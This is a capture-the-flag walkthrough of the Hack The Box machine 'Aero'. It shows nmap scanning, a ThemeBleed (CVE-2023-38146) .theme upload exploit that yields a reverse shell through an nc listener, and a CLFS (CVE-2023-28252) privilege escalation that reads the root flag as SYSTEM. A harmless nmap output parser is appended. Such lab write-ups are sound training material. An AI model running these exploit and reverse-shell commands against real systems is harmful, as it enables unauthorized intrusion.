# Aero

October 25, 2025

| Created by | Page | Difficulty | OS |
|---|---|---|---|
| ctrlzero | Hack The Box | Medium | Windows |

## Enumeration

I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports:

```bash
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.237 -oG scan
/opt/extractports scan
nmap -p80 -sCV 10.10.11.237 -oN ports
```

Next I list the technologies used by the website with whatweb. This reveals the domain aerohub.htb, which I add to the hosts file:

```bash
whatweb http://10.10.11.237
```

## Exploiting the file upload

The website states that we are dealing with a Windows 11 machine, and a little further down there is a section that allows us to upload .theme files. Searching for vulnerabilities with this information leads to CVE-2023-38146. To exploit it I use the Jnnshschl repository. The script starts an SMB server, and if we listen on the specified port at the same time, we get an interactive shell:

```bash
python3 themebleed.py -r 10.10.14.17 -p 4711
rlwrap -cAr nc -lvnp 4711
```

This way we are connected to the system as the user sam.emerson and can read the first flag.

## Privilege Escalation

While exploring the file system, I located a file named CVE-2023-28252_Summary.pdf in the Documents folder of the user sam.emerson. Its content describes this CVE and the steps that must be taken to mitigate it. Searching for information about this CVE, I found a PoC that allows commands to be executed as the NT AUTHORITY\SYSTEM user. After uploading this binary to the system and testing it, I saw that the changes to prevent this vulnerability had not yet been applied. Thanks to this, I can read the second flag:

```powershell
.\clfs_eop.exe 'type C:\users\administrator\desktop\root.txt'
```
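The `/opt/extractports scan` helper used in the Enumeration step is not shown on the page. As an added example (not the author's script), here is a small Python parser for nmap's grepable (`-oG`) output that returns the open ports per host and builds the `-p` value for the follow-up `-sCV` scan; the scan output embedded below is constructed, not the real output from the box.

```python
import re
from typing import Dict, List

# Constructed sample of nmap -oG output; it mimics the format of the
# "scan" file from the enumeration step but is not the real result.
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated as: nmap -p- --open -sS -oG scan 10.10.11.237\n"
    "Host: 10.10.11.237 ()\tStatus: Up\n"
    "Host: 10.10.11.237 ()\tPorts: 80/open/tcp//http///, "
    "443/closed/tcp//https///, 5985/open/tcp//wsman///"
    "\tIgnored State: filtered (65532)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 60.00 seconds\n"
)

# One entry of the "Ports:" field: port/state/protocol/owner/service/rpc/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/")


def parse_open_ports(gnmap: str) -> Dict[str, List[int]]:
    """Return {host: sorted open TCP/UDP ports} from grepable nmap output."""
    found: Dict[str, set] = {}
    for line in gnmap.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        for match in PORT_RE.finditer(ports_field):
            port, state = int(match.group(1)), match.group(2)
            if state == "open":
                found.setdefault(host, set()).add(port)
    return {host: sorted(ports) for host, ports in found.items()}


def ports_argument(gnmap: str, host: str) -> str:
    """Comma-separated list usable as nmap's -p value (empty if none open)."""
    return ",".join(str(p) for p in parse_open_ports(gnmap).get(host, []))


if __name__ == "__main__":
    print(parse_open_ports(SAMPLE_GNMAP))
    print("nmap -p" + ports_argument(SAMPLE_GNMAP, "10.10.11.237") + " -sCV 10.10.11.237")
```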